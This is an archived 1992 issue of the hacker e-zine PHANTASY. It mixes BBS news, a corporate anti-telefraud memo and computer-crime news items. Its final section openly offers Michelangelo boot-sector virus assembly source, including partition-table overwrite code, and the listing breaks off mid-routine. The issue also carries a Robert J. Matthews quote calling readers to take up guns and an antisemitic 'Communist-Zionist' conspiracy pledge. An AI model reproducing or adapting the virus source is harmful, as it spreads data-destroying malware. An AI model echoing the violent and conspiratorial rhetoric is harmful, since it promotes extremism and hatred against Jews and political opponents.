💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › PHANTASY › phant-3.8 captured on 2022-06-12 at 13:55:30.

View Raw

More Information

-=-=-=-=-=-=-

      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      =                                                               =
      -                WELCOME TO THE EIGHTH ISSUE OF                 -
      =                                                               =
      -                        -=>PHANTASY<=-                         -
      =                                                               =
      -               A PUBLICATION AND NEWSLETTER OF                 -
      =                                                               =
      -                             THE                               -
      =                        INTERNATIONAL                          =
      -                         INFORMATION                           -
      =                          RETRIEVAL                            =
      -                            GUILD                              -
      =                                                               =
      -        Hacking,Phreaking,Anarchy,Survivalism,Commentary       -
      =                                                               =
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

           Volume Number Three,Issue Number Eight Dated 6/05/92
               Editor: Mercenary@f515.n141.z1.fidonet.org

             Article Submissions: The Mercenary/IIRG
                                  862 Farmington Avenue
                                  Suite 306
                                  Bristol,Ct 06010

           IIRG World Headquarters BBS: Dark Shadows
                                        19.2/9600 Baud HST
                                        24 Hours a Day
                                        1.2 Gigs Online
                                        (203)-628-9660

        Table of Discontents:


          [1] Quick Comment
              By: Mercenary

          [2] Communists Alive and Well in the U.S.
              By: Red Dawn

          [3] TeleFraud: (A Case Example)
              By: Anonymous

          [4] IIRG Members Profiles: Rowdy Roddy Piper

          [5] New World Order Pledge of Dis-Allegiance
              Provided By: Saint Anarchy

          [6] IIRG FREEBIES: New Section Devoted to promotions
                             available to our readers!

          [7] PHANTASY TIDBITS: News and Views of Interest


          [8] FOR THE PEOPLE
              Supplied By: Bulletin Boards Across the Country
              Edited by: Mercenary

                      1. Michelangelo Source Code
                      2. Phil Katz Warning
                      3. Virus Poem


          [9] Listing of PHANTASY Distribution Sites

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    OFFICIAL DISLAIMER...

    All information in PHANTASY is from USER contributed material
    The Publishers and Editors of PHANTASY and THE IIRG disclaim
    any liability from any damages of any type that the reader or
    user of such information contained within this newsletter may encounter
    from the use of said information. All files are brought to you for
    entertainment purposes only! We also assume all information infringes
    no copyrights and hereby disclaim any liability.

    PHANTASY is (C) 1990 by The IIRG
    IIRG and INTERNATIONAL INFORMATION RETRIEVAL GUILD is (C) 1982

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [1]: Quick Comment
              By: Mercenary

        ATTENTION!! All File creators,Publishers,BBS-aholics
                    the Former IIRG WHQ Runestone BBS is gone.
                    Please do not list it in your files.
                    The New WHQ is:


           IIRG World Headquarters BBS: Dark Shadows
                                        19.2/9600 Baud HST
                                        24 Hours a Day
                                        1.2 Gigs Online
                                        (203)-628-9660


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [2]: Communists Alive and Well in the U.S.
              By: Red Dawn

  The Berlin Wall came down, and its about time. But the RED Menace is alive
 and Well folks. The So called Russian Republics (Soviet DisUnion) haven't
 gone anywhere. So why are the piss ant politicians in the U.S. rolling over
 and playing Dead? Money, Yes its that simple Money.
  One world Government means power and power means money and as long as our
 leaders are more concerned about filling thier pockets and not filling
 peoples stomachs, were on our own.
  The Chinese Communists just exploded the largest underground nuclear blast
 ever, the Soviets still have there nukes and the PLP is alive and well here
 in the U.S.
  On a recent jaunt up to MIT, I was approached by a PLP (Progressive Labor
 Party) member. The PLP is the American Communist Party for those who are new
 to this. He asked if I'd like to buy a copy of "Challenge" (The Revolutionary
 Communist Newspaper) I said No, but I'll take this copy for free comrade.
 and walked off with the poor little Reds paper.
  NOTE: Please dont feel bad for the Red, Communism states whats yours is mine
        so I was just teaching him about true Communism control
  Now the PLP is getting smart, they are recruiting Puerto Ricans and other
 third world spanish speakers, as the lead story is "STOP RACIST REPATRIATION
 OF HAITANS" and the paper is now half spanish.
  What better way to boost your cause then appeal to an already unrestful
 group of people.
  Well I say enough, lets show the Communists that we can take America Back
 by unseating mailing them your thoughts.

 I'd Advise this on a Post Card:

  We Love America,and not Karl Marx.... Signed a Concerned American

 Mail to: The Progressive Labor Party
          231 West 29th Street
          Room 502
          New York,NY 10001

 Or Call: (212)-629-0002

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 GIVE YOUR SOUL TO GOD AND PICK UP YOUR GUN, ITS TIME TO DEAL IN LEAD.
 WE ARE THE LEGIONS OF THE DAMNED,THE ARMY OF THE ALREADY DEAD.

                                   Robert J. Matthews

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [3]: TeleFraud: (A Case Example)
              By: Anonymous

  Hacking and Phreaking has long been a game of cat and mouse, between
 Hacker and System Administrator. In a role reversal I'd like to present
 the response of an Undisclosed Insurance Company to hackers penetrating
 thier system by presenting the memo distributed to system operators.

-------------------------------------------------------------------------------
 From the Director of Systems Security to all employees:

  We have experienced telephone fraud (TeleFraud) in which outsiders,
 (I.E. Hackers) penetrated a regional office telephone system and made long
 distance calls that were charged to the company (In one case the cost of
 those calls was about $27,000) A number of steps are being implemented to
 elimanate this exposure) We want to inform you about some of them, and ask
 for your help and cooperation.

 NOTE: This article may contain terminology new to you. A "Definition of Terms"
       is included on the last page to help clarify these terms.


 BACKGROUND:

  The most common form of telefraud involves the use of 800 numbers,credit
  cards, and third party calling. Hackers get these numbers from a number of
  sources, such as:

  A. Advertisements

  B. Eavesdropping (e.g. when you charge your telephone call to another number
     while using a public telephone)

  C. Using old company telephone books and manuals that contain numbers of
     Key System or Private Branch Exchange (PBX) systems, which are the heart
     of our internal telephone system.

  Technically sophisticated hackers dial these numbers, and through computer
 program routines, determine authorization codes.
  Having learned these codes, they post them on computer bulletin boards or
 sell them. Literally within minutes unauthorized calls are passing through
 the system.
  To reduce or eliminate this exposure, our department as well as others are
 working together to protect our telephone systems. Some of these protection
 measures include:

 1. Development and implementation of controls in conjuction with our telephone
    vendors (e.g. AT&T and MCI) to restrict access to certain telephone
    features. Some of these controls include prohibiting the use of Remote
    Access,trunk to trunk,and DISA services.

 2. Making you, as telephone users, aware of this problem and identifying ways
    you can help. This memo is part of this program.

 HOW CAN YOU HELP?:

 Here are some suggestions:

 Telephone Credit Cards:

  1. Don't give your credit card number to anyone
  2. When calling from a payphone, use card readers whenever possible.
  3. Don't read the number loud enough for others to hear, or let others
     observe you entering your number.
  4. Report lost or stolen cards immediately.
  5. Use your body to block the view of someone who may be watching to see the
     access code you are punching into the telephone.

 800 Service:

  1. Don't install an 800 number unless it's absolutely necessary.
  2. Remove the line when it's no longer needed.
  3. Limit 800 service to applications that are answered by people.
  4. Avoid 800 service to Phonemail or Voice Response Units (VRU).

 International/Domestic Toll Calls:

  1. Block country and/or area codes that you don't call.
  2. Limit the use of International Class of Service at the handset level.
  3. Block 900 calls with the local telephone company.

 Dial Data Lines:

  1. Block third party calling with the local telephone company.
  2. Establish VNET range restrictions

 Remote Access:

  1. Disable this feature on the PBX. We have surveyed our PBX vendors
     country-wide to ensure these facilities are not enabled.

 Trunk-to-Trunk:

  1. Disable this feature on the PBX. We have surveyed our PBX vendors
     country-wide to ensure these facilities are not enabled.

 Phonemail:

  1. Change passwords frequently
  2. Deactivate unused mailboxes
  3. Limit the number of "Guest" mailboxes
  4. Don't publish the system access number to anyone who doesn't use
     phonemail.
  5. Lock out the subscriber after three unsuccessful attempts to enter the
     mailbox.
  6. Keep system administrator ID's secret and change them frequently.

 Third Party Calling:

  1. Request the local telephone company to block third party calling on
     dial data,fax,and private lines.
  2. Limit the installation of private lines

 PBX (Private Branch Exchange):

  1. Do not reveal maintenance port passwords to callers without positive ID
  2. Delete unused extensions

 VRU (Voice Response Units):

  1. Do not enable trunk-to-trunk transfer.
  2. Program only a select number of extensions to which callers can be
     transferred (i.e. establish a table of extensions).
  3. Do not program station transfer
  4. Passwords, (e.g. logon ID's customer PIN's) should be carefully protected
     and changed frequently.

 Automated Attendant:

  1. Do not enable trunk-to trunk transfer.
  2. Do not program station transfer
  3. Delete unused extensions
  4. Deactivate software features if not in use.

 Hardcopy Listings:

  1. Properly dispose of old telephone books,manuals,or telephone bills that
     contain sensitive telephone numbers.
  2. Review all telephone charges,looking for patterns and excessive charges.

 Dial Access to Computers:

  1. Secure dial lines to all computer systems.

 Miscellaneous:

  1. Be cautious of unusual situations with your telephone system, such as
     busy signals at odd times.


                          DEFINITION OF TERMS


   PBX

   Private Branch Exchange. Private automatic system that provides for the
   switching of calls internally, and to and from the public telephone
   network.

   Trunk-to-Trunk

   A "trunk" is the telephone line that connects a PBX to the telephone
   company. Therefore a trunk-to-trunk connection ties a PBX system to the
   telephone company.

   DISA

   Stands for Direct Inward System Access. This feature gives an outside
   caller the ability to dial directly into a PBX system, without attendant
   (i.e. operator) intervention, and gain access to the PBX system facilities
   and outgoing circuits. DISA software should be disabled, thus eliminating
   this feature/exposure.

   Voice Mail

   Hardware and software products that can be integrated or peripheral to a
   PBX system, allowing users to send,receive,and redirect voice messages
   through office telephone systems and computers.

   Automated Attendant

   An automated telephone system used to accept incoming calls and direct
   their callers to specific extensions based upon the caller entering touch
   tone numbers. For example, a hacker could call someones Voicemail mailbox
   from the outside and try to break in.

   VRU (Voice Response Unit)

   An interactive system that interfaces between the PBX and host computer
   based upon information provided by the caller (e.g. account number,social
   security number)

   Remote Access

   Allows a caller at a remote location to access PBX features by telephone.
   Individual authorization codes are usually required. Remote access allows
   the caller to potentially access an outside (e.g. long distance) line,
   and is usually accomplished through the use of DISA or automated
   attendant features.

   VNET (Virtual Network)

   A registered MCI service that offers a range of telephone limits and/or
   restrictions (e.g. allows calls only within U.S., does not allow calls to
   Virgin Islands,etc.)

   Key System:

   A small, multi-line internal telephone system similar to a PBX.
   Norstar,Spirit,and Merlin are examples of a key system.



   Remember: All of us are potential victims of telephone fraud. Hackers are
             determined to use our telephone system and not pay for that
             service. Please be as determined to ensure they do not.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

            ONE CRIME IS CONCEALED BY THE COMMISSION OF ANOTHER

                                               Seneca

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [4]: IIRG Members Profiles: Rowdy Roddy Piper

------------------------------------------------------------------------------
                           Rowdy Roddy Piper
------------------------------------------------------------------------------

Handle: Rowdy Roddy Piper
Call him: Piper
Past handles: None
Handle origin: Wrestler Rowdy Roddy Piper of WWF fame
Past Computers: Commodore 64  With ICT Data Chief
                Commodore 128
                Amiga 1000
                286/12

Present Computer: 386/33
                  1300 Megs Storage
                  Courier HST
                  Courier HST Dual Standard


Sysop: Pipers Pit BBS

Background:

   Piper Started his original Commodore oriented BBS in March 1985. The Board
  was originally run off of a C-64 with 2 SFD 1001's. Continually upgrading his
  system Piper switched from his original C-Net configuration to Color 64
  with a C-128 with 1750 Ram expander and 2 ICT Data Chief HFD20's.
   It was at this time that Piper met Mercenary at the now defunct CompuTech
  systems and started attending the original IIRG meetings at the Bar and
  pizza joint next door.
   With the Commodore community rapidly dwindling and the IIRG no longer
  supporting the C64/128, Piper sold his Commodore BBS for a $400.00 profit
  over what he invested in it and Bought a 286/12 and an Amiga 1000 with
  1.5 megs.
   Now, with the his vast majority of users being IBM, Piper has switched
  to a 386/33 Tower with 1300 Megs of storage,2 Nodes (HST and HST D/S.
   But being true to his roots, Piper still supports the Amiga line.


Pipers Favorite Things
----------------------

     Running his BBS
     Music (Extensive CD Collection)
     The one month his phone bill ran under $100.00

Most Memorable Experiences
--------------------------

     Selling his original commodore BBS for $400.00 more than he originally
     purchased the Equipment for, and passing out at the 1989 IIRG Hack
     Bash before the keg was tapped.


People to Mention
-----------------
 Thanks to: Pie Man,
            Mercenary, a downright strange individual
            Anubis, an even stranger individual
            The now defunct CompuTech systems and its owner Redbone

 Fucks to:  Internal Revenue, America's Legal Organized Crime Syndicate
            Credit Bureaus, Go ahead---Make my Limit
            and 95% of all elected officials

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    A NICKNAME IS THE HEAVIEST STONE THE DEVIL CAN THROW AT A MAN

                                                  Anon

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [5]: New World Order Pledge of Dis-Allegiance
              Provided By: Saint Anarchy

   As our brave and trustworthy leaders usher in there new world order,
   I suggest each one of you memorize this Pledge to it.

   We pledge dis-allegiance to the United Nations flag and the confusion,
  the treason,the wars,and the bloodshed for which it stands.
   One World (under Satan), uniting all nations under one Communist-Zionist
  international economic control.
   Promoting (under the guise of benevolence and welfare) Metro Government,
  Regionalization,Urban Renewal,Model Cities,causing distress to young and
  old,totally changing our form of government, and working toward a One
  World Bank (Acclomplished, a One World Government,and a One World Church,
  without God and his Holy Word, the Bible. In his name we reject and defy
  the United Nations Flag and the totalitarianism for which it stands.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   FREEDOM HATH A THOUSAND CHARMS TO SHOW
                         THAT SLAVES HOWE'ER CONTENDED NEVER KNOW

                                               Cowper

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [6]: IIRG FREEBIES: A new section to Phantasy
              BY: Mercenary

-------------------------------------------------------------------------------
 [1] Security for VMS Systems Handbook
     Available from Digital Equipment Corporation
     Free of Charge
     Call 1-800-332-4636 Extension: SECURE
-------------------------------------------------------------------------------
 [2] Free $15.00 Introductory Usage to CompuServe
     Free Complimentary subscription to CompuServe Magazine
     Compliments of Digital Equipment Corporation
     Call 1-800-524-3388 Ask for Represenative #332
-------------------------------------------------------------------------------
 [3] ARAGO Professional dBASE
     Call 1-800-228-3295
     Ask for Free Demo Disk
-------------------------------------------------------------------------------
 [4] Flow Charting 3
     Call 1-800-525-0082 Extension 1117
     Ask for Free Interactive Demo Disk
-------------------------------------------------------------------------------
 [5] Vermont Views
     Portable User-Interface for Dos,Unix,Posix,VMS...
     Free Demo Kit
     Call 1-800-848-1248
     Mention Offer #303
-------------------------------------------------------------------------------
 [6] National Instruments
     Lab Programs
     Free Demo Disks
     1-800-433-3488
-------------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [7]: PHANTASY TIDBITS: News and Views of interest from around the
                                Computer World

-------------------------------------------------------------------------------

                       I GOT EM,I GOT EM, I GOT EM....

 Arizona Law officers are fuming that the U.S. Justice Department is taking
 credit for the first successful prosecution under the Operation Sundevil
 computer crime investigation. They point out that they nabbed and convicted
 two hackers swept up in the nationwide crackdown on computer crime several
 months ago. One of the hackers is still doing time in a halfway house after
 spending six months in "shock incarceration," a boot camp for first time
 offenders.

-------------------------------------------------------------------------------

                         POOR LITTLE BIG BROTHER....

 Difficulties tapping advanced digital telephone networks for criminal
 investigations have inspired the Federal Bureau of Investigation to propose
 legislation requiring carriers to modify their networks to accommodate court
 approved wiretaps. The multimillion dollar cost of re-engineering the
 networks would be borne by rate payers. Civil liberties groups said a built
 in tapping capability might encourage overly broad government surveillance.

-------------------------------------------------------------------------------

              COULD I GET SOME MINT JELLY WITH THAT PLEASE?

 A man charged with stealing computer boards from Digital Equipment Corporation
 between February and October 1990 recently received the severed head of a lamb
 wrapped in towels through the U.S. Mail. The box arrived at the Lexington,
 Mass., home of Edward Desmond Jr. on Feb 28th. Desmond had cooperated with the
 government during part of the 2 1/2 year investigation, which led to the
 indictment of 16 people. A plea agreement with Desmond was reportedly
 rescinded after he was caught commiting other crimes.

-------------------------------------------------------------------------------

              INTERNET ADVISORY BOARD SETS S.N.M.P. SECURITY RULES

 The Simple Network Management Protocol (SNMP) security specifications now
 before the Internet Advisory Board would provide the following features:

 1. A data-encryption standard based specification that encrypts messages
    between the SNMP manager and agent. This is useful for sending down new or
    updated keys that determine what management functions a SNMP station can
    access or that define authorization levels within a station.

 2. Origin Authentication that prevents unauthorized users who have obtained
    an SNMP workstations access code from masquerading as an authentic user.

 3. Replay protection that keeps a user from delaying an SNMP transmission,
    such as a command to take a workstation offline, and sending it at a later
    date.

 4. Message integrity that keeps authorized users from changing the contents
    of a SNMP message.

-------------------------------------------------------------------------------

                  BOOK PUSHER SEEKS TO INFLATE EGO

 Computer Security Expert Winn Schwartau, whose book, Terminal Compromise,
 describes how a terrorist gang could paralyze the U.S. with a computer virus,
 sees a parrallel between his text and real life.
 "When the Michelangelo virus scare began, it was eerie, like somone had lifted
 the events right out of my book," he says. "Viruses are evolving into a
 terrorist's weapon and are certainly a viable means of waging warfare."
 Terminal compromise is published by Pittsburg-Based Inter-Pact press.

 IIRG Note: This Jack Ass will say anything to sell his book, so save the
            $19.95 and go out and get drunk instead. The book is pure
            garbage.

-------------------------------------------------------------------------------

                   JACKASS's and MORE JACKASS's

 The Associated press reports that the theft of a portable PC in Australia was
 solved when the thief sent a fax to the unit's maker, DFM Systems of Des
 Moines,Iowa asking for a power cord,documentation, and software.
 What the crook didn't know was the DFM TraveLite PC was the only such system
 in Australia. The unit was owned by Sydney based ACEL, which the thief had
 burglarized. DFM contacted ACEL's managing director, who then contacted the
 police. A ploice officer later contacted the crook, who had supplied his
 street address on the fax.

-------------------------------------------------------------------------------

                I HEAR YA' KNOCKIN, BUT YA' CAN'T COME IN

 Whozz Calling uses your local phone company's Caller ID service to intercept
 the ID information before you answer your phone. The product sends the
 identification of the caller via standard RS-232 serial wire to your computer
 which looks up the caller name,displays it,stores it,elects not to answer the
 call, or diverts the call to an answering machine.
 A DOS compatible,menu driven TSR program can optionally pop up information
 about the caller,bringing up the callers ID before you answer the phone.

 Price: $79.00 (Requires Caller ID)
 Contact: Zeus Phonstuff
          1000 Holcomb Woods Parkway
          Suite 410-C
          Roswell,GA 30076
          (404)-587-1541
          (404)-587-1609 (FAX)

-------------------------------------------------------------------------------

                TWO AT CORNELL INDICTED IN VIRUS CASE

 Two Cornell University students now have been indicted for felonies in
 connection with the computer virus case that came to light last
 February at the Ithaca, N.Y., university.

 David Blumenthal and Mark Pilgrim are accused of embedding a virus in
 three Apple Macintosh computer games that were sent from Cornell's
 computer center to an archive at Stanford University. Authorities say
 from there, the games were duplicated and wound up in computers across
 the U.S., Japan and Great Britain.

 Blumenthal, 20, and Pilgrim, 19, who, in convicted, face a maximum
 four years in prison, were arrested in February on misdemeanor
 charges, which were increased to felonies because the virus is
 believed to have caused more than $1,000 in damage, said county
 District Attorney George Dentes.

-------------------------------------------------------------------------------
       AT&T INTRODUCES PRODUCTS TO FIGHT PHONE FRAUD  NEW YORK (Reuter)

-- American Telephone & Telegraph Co. rolled out a new security program
yesterday aimed at protecting businesses from anyone who might try to "steal"
their long-distance telephone service.  Branding phone fraud as a nationwide
problem costing upwards of $1.2 billion a year, the company said its AT&T
NetProtect program gives customers the products, services and education they
need to combat such fraud, as well as protection against financial liability.

  Long-Distance fraud often takes place when an outsider, say a computer
hacker, cracks the access codes to a company's private branch exchange, or PBX
-- an internal phone system that allows easy access to branch offices and major
customers.  The PBX can then be used to place long-distance or international
calls as if by someone inside the company.  The practice, a misdemeanor crime
with no jail sentence in many states, typically is done for monetary gain. The
"stolen" service can be sold on the street, sometimes providing drug
traffickers with international calls that cannot be traced.  "Long-distance
fraud is a serious criminal problem, and we believe AT&T should stand squarely
with our customers against the criminals who steal the service," said Joseph
Nacchio, president of AT&T's Business Communications Services division.  AT&T,
the long-distance carrier created by the 1984 breakup of the former Bell
telephone system, said its new program would relieve customers from liability
for the fraud.  The company this week began monitoring its toll-free 800 service
at no extra charge to prevent fraud. From Aug. 1, it also will monitor inter-
national long-distance service to countries experiencing high levels of fraud.

  An AT&T spokesman declined to disclose the cost for enhanced and premium
services that protect customers from financial liability, saying the cost
structure has not yet been filed with the Federal Communications Commission.

  Other packages include a $1,995 software package that alerts customers to
unusual calling patterns and a $150 an hour intervention service under which
AT&T experts try to stop fraud while it is in progress.
-------------------------------------------------------------------------------

                     WORLDWIDE MOBILE DATA SOLUTIONS

  ATLANTA -- May 18, 1992 -- Digital Equipment Corporation, RAM Mobile
 Data, and BellSouth Enterprises, Inc. today announced a worldwide
 agreement to provide mobile data solutions based on the Mobitex
 mobile packet radio network.
  Under the agreement, Digital will offer two-way wireless
 electronic mail to its more than three million existing ALL-IN-1
 integrated office system customers. Digital is developing a
 version of its Mobilizer for ALL-IN-1 software that will enable
 users of portable MS-DOS PCs to access ALL-IN-1 electronic mail
 applications without a connection to a telephone outlet.
  Digital plans to provide the same services on the Mobitex
 mobile network in the United Kingdom. In addition, wireless
 electronic mail services will be offered to customers in several
 other countries where RAM and BellSouth plan to operate Mobitex
 networks. Digital's wireless electronic mail offering will be
 available in the first quarter of calendar year 1993.
  Digital also announced the DECmobile program, under which
 the company will deliver fully integrated, end-to-end mobile data
 communications solutions that extend enterprise computing
 networks to mobile users. The announcements were made at the ICA
 telecommunications industry conference held here May 18-21.
 "With these announcements, Digital is moving aggressively
 into the fast-growing mobile data market," said Ernst E.
 Wellhoener, vice president of Digital's Telecommunications
 Business Group. "We are supporting our commitment with
 substantial investments of time, money, and resources to build
 the kinds of mobile data solutions our customers require."
  Digital Becomes RAM Mobile Data Systems Integrator
 Under the DECmobile program, Digital will offer customers
 complete mobile data solutions, acting as systems integrator for
 RAM Mobile Data and other service providers.  Digital will
 provide a single point of contact for customers seeking to
 benefit from new mobile data communications services.
  Digital is entering into business relationships with leading
 suppliers of radio modems, handheld PCs, and cellular devices.
 The company currently has relationships with Ericsson Mobile
 Communications AB, Fujitsu Personal Systems (formerly Poqet
 Computer Corporation), and Husky Computers, Inc.
 "The move into mobile data represents a natural progression
 for Digital, a leader in providing networked computer systems and
 one of the computer industry's foremost systems integrators,"
 Wellhoener said.  "Our ability to provide 'one-stop shopping' for
 mobile data solutions helps simplify what might otherwise be a
 difficult process for our customers, enabling them to get
 up-to-speed faster and more cost-effectively."
  Wellhoener said Digital chose Mobitex networks because they
 are feature-rich, sophisticated, and highly efficient. "And
 perhaps most important, the worldwide scope of Mobitex networks
 will enable us to meet the needs of today's multinational
 enterprises," Wellhoener added.

  Mike Harrell, president of BellSouth Mobile Data, Inc., said
 the alliance would enable mobile data network subscribers to take
 advantage of Digital's worldwide systems integration
 capabilities. "Aligning ourselves with an experienced systems
 integrator ensures our network subscribers have the most
 effective solutions," Harrell said. "We can now expand the market
 for Mobitex into a broad range of networked computer applications."
  Carl Robert Aron, chairman and CEO of RAM, said, "ALL-IN-1
 is the world's leading host-based application that includes
 electronic mail.  RAM's Mobitex network is the only mobile data
 network in operation which automatically delivers E-mail messages
 to mobile professionals wherever they are within the network
 service area. The marriage of Mobitex and Mobilizer for ALL-IN-1
 was inevitable."
  Digital Develops Mobile Data Products and Programming Tools
 In addition to developing a wireless interface for its
 Mobilizer for ALL-IN-1 product, Digital is developing an open
 software architecture and a single set of application programming
 interfaces that will be available to software developers. The
 architecture and application programming interfaces, or APIs,
 facilitate the integration of new and existing mobile applications
 for RAM's and other service providers' networks.  APIs make it easy
 for developers to write mobile data applications.
  BellSouth Mobile Data is a subsidiary of BellSouth
 Enterprises, Inc., the holding company that manages a group of
 companies for BellSouth Corporation that provide wireless
 telecommunications, advertising and publishing, and
 information-based services throughout the world.
  RAM Mobile Data operates a wireless data communications
 service in major metropolitan areas across the nation.  Using
 RAM's service, companies exchange two-way messages and data with
 field personnel equipped with mobile, portable, or handheld
 terminals.  RAM Mobile Data Ltd. operates a similar, compatible
 system in the United Kingdom.  RAM's radio-based data
 communications network architecture is Mobitex, an international,
 open standard supplied by Ericsson.
  RAM has exclusive use of the Mobitex technology in the
 United States. Mobitex was developed by Ericsson Mobile
 Communications AB and Swedish Telecom. Digital and Ericsson last
 year signed a cooperation agreement under which the two companies
 will develop software tools for the integration of Digital's
 products with the Mobitex network.

  ALL-IN-1, DECmobile, the Digital logo, and Mobilizer for ALL-IN-1 are
  trademarks of Digital Equipment Corporation.
  Mobitex is a registered trademark of Swedish Telecom
  MS-DOS is a registered trademark of Microsoft Corporation.
  RAM Mobile Data's legal name is RAM Mobile Data USA Limited Partnership

------------------------------------------------------------------------------

               HONEST OFFICER!, HE SAID HE BOUGHT THE STUFF

  Microsoft and the FBI recently raided four Silicon Valley companies
 seizing bootleg copies of MS-DOS 5.0 and Windows 3.0 as well as associated
 manuals with a street value of more than $180,000. The Tip-off came when
 distributors tried to sell MS-DOS 5.0 seperately.

-------------------------------------------------------------------------------

                       BIG MAC ATTACK FOILED

  Two Cornell University students have been accused of creating a computer
 virus called MBDF-A, that infected computers around the world.
  David Blumenthal,20 and Mark Pilgrim,19 face a maximum four years in prison
 for allegedly hiding the virus in three Macintosh computer games that were
 sent via modem from Cornell's computer center to an archive at Stanford.
  Macintosh PC's across the USA,Great Britain,and Japan were infected when
 users downloaded the games. Once in the Macs the virus destroyed the operating
 system.
  The two were arrested on misdemeanor charges which have been increased to
 felonies because the virus may have caused more than $1,000 in Damage.

-------------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [8]: FOR THE PEOPLE
              Files Collected from BBS's Across the country
              By You the Computer User!
              Edited By: Mercenary

-------------------------------------------------------------------------------
 IIRG NOTE: This source code file was floating around for some time
            we provide it here for the programmer or viral software lover.
-------------------------------------------------------------------------------
;
;
;     Michelangelo
;     Size: 512
;     Type: Boot infector
;     Date of action: March 6th
;
;

data_1e        equ  4Ch            ; (0000:004C=1DB1h)
data_2e        equ  4Eh            ; (0000:004E=70h)
data_3e        equ  413h           ; (0000:0413=280h)
data_4e        equ  7C05h          ; (0000:7C05=203Ch)
data_5e        equ  7C0Ah          ; (0000:7C0A=49EBh)
data_6e        equ  7C0Ch          ; (0000:7C0C=2A3Ch)
data_7e        equ  7              ; (694E:0007=0)
data_8e        equ  8              ; (694E:0008=0)
data_9e        equ  0Ah            ; (694E:000A=0)
data_11e       equ  7C03h          ; (694E:7C03=0)

seg_a          segment
          assume    cs:seg_a, ds:seg_a


               org  100h

mich      proc      far

start:
          jmp  loc_6 ; (01AF) "This is what you see at sector 0"
          db   0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
          db   0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
          db   50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
          db   0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
          db   4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
          db   9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
          db   9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
          db   2, 0, 58h, 1Fh, 2Eh, 0FFh
          db   2Eh, 0Ah, 0, 50h, 53h, 51h
          db   52h, 1Eh, 6, 56h, 57h, 0Eh
          db   1Fh, 0Eh, 7, 0BEh, 4, 0
loc_1: ;Init registers
          mov  ax,201h
          mov  bx,200h
          mov  cx,1
          xor  dx,dx               ; Zero register
          pushf                    ; Push flags
          call dword ptr ds:data_9e; (694E:000A=0)
          jnc  loc_2               ; Jump if carry=0
          xor  ax,ax               ; Zero register
          pushf                    ; Push flags
          call dword ptr ds:data_9e; (694E:000A=0)
          dec  si
          jnz  loc_1               ; Jump if not zero
          jmp  short loc_5         ; (01A6)
loc_2: ;Zero registers clear direction
          xor  si,si               ; Zero register
          cld                      ; Clear direction
          lodsw                    ; String [si] to ax
          cmp  ax,[bx]
          jne  loc_3               ; Jump if not equal
          lodsw                    ; String [si] to ax
          cmp  ax,[bx+2]
          je   loc_5               ; Jump if equal
loc_3: ; cmp byte ptr See infected
          mov  ax,301h
          mov  dh,1
          mov  cl,3
          cmp  byte ptr [bx+15h],0FDh
          je   loc_4               ; Jump if equal
          mov  cl,0Eh
loc_4: ;call out all db hiden data
          mov  ds:data_8e,cx       ; (694E:0008=0)
          pushf                    ; Push flags
          call dword ptr ds:data_9e; (694E:000A=0)
          jc   loc_5               ; Jump if carry Set
          mov  si,3BEh
          mov  di,1BEh
          mov  cx,21h
          cld                      ; Clear direction
          rep  movsw               ; Rep while cx>0 Mov [si]
          mov  ax,301h             ; to es:[di]
          xor  bx,bx               ; Zero register
          mov  cx,1
          xor  dx,dx               ; Zero register
          pushf                    ; Push flags
          call dword ptr ds:data_9e; (694E:000A=0)
loc_5: ;Clear all set
          pop  di
          pop  si
          pop  es
          pop  ds
          pop  dx
          pop  cx
          pop  bx
          pop  ax
          retn
loc_6: ;Load all hiden data
          xor  ax,ax               ; Zero register
          mov  ds,ax
          cli                      ; Disable interrupts
          mov  ss,ax
          mov  ax,7C00h
          mov  sp,ax
          sti                      ; Enable interrupts
          push ds
          push ax
          mov  ax,ds:data_1e       ; (0000:004C=1DB1h)
